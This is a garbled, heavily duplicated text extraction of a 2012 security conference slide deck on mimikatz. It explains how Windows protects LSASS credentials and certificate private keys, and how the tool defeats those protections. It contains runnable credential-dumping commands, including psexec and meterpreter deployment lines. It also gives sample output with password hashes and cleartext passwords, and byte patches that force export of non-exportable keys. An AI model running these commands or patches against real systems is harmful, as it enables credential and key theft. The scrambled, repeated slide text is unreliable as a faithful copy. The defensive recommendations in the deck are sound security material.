ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
